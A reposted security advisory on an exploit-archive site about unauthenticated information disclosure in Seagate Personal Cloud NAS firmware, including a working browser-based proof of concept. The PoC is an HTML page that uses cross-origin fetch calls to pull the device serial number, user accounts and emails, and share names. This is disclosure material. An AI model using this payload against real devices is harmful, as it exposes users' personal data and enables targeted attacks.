首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Seagate Personal Cloud Information Disclosure
来源:nl.linkedin.com/in/yorickkoster 作者:Koster 发布时间:2018-09-13  
------------------------------------------------------------------------
Seagate Personal Cloud multiple information disclosure vulnerabilities
------------------------------------------------------------------------
Yorick Koster, September 2017

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Seagate Personal Cloud is a consumer-grade Network-Attached Storage
device (NAS). It was found that the web application used to manage the
NAS is affected by various unauthenticated information disclosure
vulnerabilities. The device is configured to trust any CORS origin, and
is accessible via the personalcloud.local domain name. Due to this it is
possible for any website to gain access to this information. While this
information doesn't allow an attacker to compromise the NAS, the
information can be used to stage more targeted attacks.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was tested on a Seagate Personal Cloud model SRN21C running
firmware versions 4.3.16.0 and 4.3.18.0. The software is licensed from
LACIE, it is very likely that other devices/models are also affected.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
These issues have been mitigated in firmware version 4.3.19.3. The NAS
no longer accepts CORS requests from arbitrary sites. A number of
endpoints now require the user to be logged in.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2017/seagate-personal-cloud-multiple-information-disclosure-vulnerabilities.html

Proof of concept:

Proof of concept

<!DOCTYPE html>
<html>
<!-- Get version information -->
<script type="text/javascript">
fetch('http://personalcloud.local/api/external/8.0/system.System.get_infos',
   {method: 'POST', body: '{}'})
   .then(function(response) {
      response.json().then(function(data){
         if(data.hasOwnProperty('infos') && data['infos'].hasOwnProperty('__properties__')) {
            props = data['infos']['__properties__'];
            vendor = props['vendor_name'];
            product = props['product'];
            version = props['version'];
            serial_number = props['serial_number'];
            console.log(vendor + ' ' + product + ' ' + version + ' (serial: ' + serial_number + ')');
         }
      });
   })
   .catch(function(err) {
      console.log('Error :', err);
   });
</script>
   
<!-- Get users -->
<script type="text/javascript">
fetch('http://personalcloud.local/api/external/8.0/simple_sharing.SimpleSharing.list_users',
   {method: 'POST', body: '{"list_info":{"__type__":"ListInfo", "__version__":0, "__sub_version__":0, "__properties__":{"limit":-1, "offset":0, "search_parameters":{"__type__":"Dict", "__sub_type__":"Unicode", "__elements__":{}}}}, "with_parameters":{"__type__":"List","__sub_type__":"Unicode","__elements__":{}}} '})
   .then(function(response) {
      response.json().then(function(data){
         if(data.hasOwnProperty('user_list') && data['user_list'].hasOwnProperty('__elements__')) {
            console.log('Users:');
            data['user_list']['__elements__'].forEach(function(user) {
               if(user.hasOwnProperty('__properties__')) {
                  props = user['__properties__'];
                  firstname = props['firstname'];
                  lastname = props['lastname'];
                  login = props['login'];
                  email = props['email'];
                  is_admin = props['is_admin'];
                  is_enabled = props['is_enabled'];
                  console.log(firstname + ' ' + lastname + ' / ' + login + ' / ' + email +
                     ' / admin: ' + is_admin + ' / enabled: ' + is_enabled);
               }
            });
         }
      });
   })
   .catch(function(err) {
      console.log('Error :', err);
   });
</script>
   
<!-- Get shares -->
<script type="text/javascript">
fetch('http://personalcloud.local/api/external/8.0/nas_authentication.NasAuth.myShares',
   {method: 'POST', body: '{"list_info":{"__type__":"ListInfo", "__version__":0, "__sub_version__":0, "__properties__":{"limit":-1, "offset":0, "search_parameters":{"__type__":"Dict", "__sub_type__":"Unicode", "__elements__":{"name":""}}, "order":{"__type__":"Ordering", "__version__":0, "__sub_version__":0, "__properties__":{"asc":false, "order_by":"name"}}}}}'})
   .then(function(response) {
      response.json().then(function(data){
         if(data.hasOwnProperty('share_through_list') && data['share_through_list'].hasOwnProperty('__elements__')) {
            console.log('Shares:');
            data['share_through_list']['__elements__'].forEach(function(share) {
               if(share.hasOwnProperty('__properties__')) {
                  props = share['__properties__'];
                  console.log(props['share']['__properties__']['name']);
               }
            });
         }
      });
   })
   .catch(function(err) {
      console.log('Error :', err);
   });
</script>
</html>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·PicaJet FX 2.6.5 - Denial of S
·CirCarLife SCADA 4.3.0 - Crede
·RoboImport 1.2.0.72 - Denial o
·PixGPS 1.1.8 - Denial of Servi
·jiNa OCR Image to Text 1.0 - D
·InTouch Machine Edition 8.1 SP
·HTML5 Video Player 1.2.5 - Den
·Tor Browser 7.x NoScript Bypas
·Easy File Sharing Web Server 6
·Tor Browser 7.0.8 Information
·phpMyAdmin Credential Stealer
·Zenmap (Nmap) 7.70 - Denial of
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved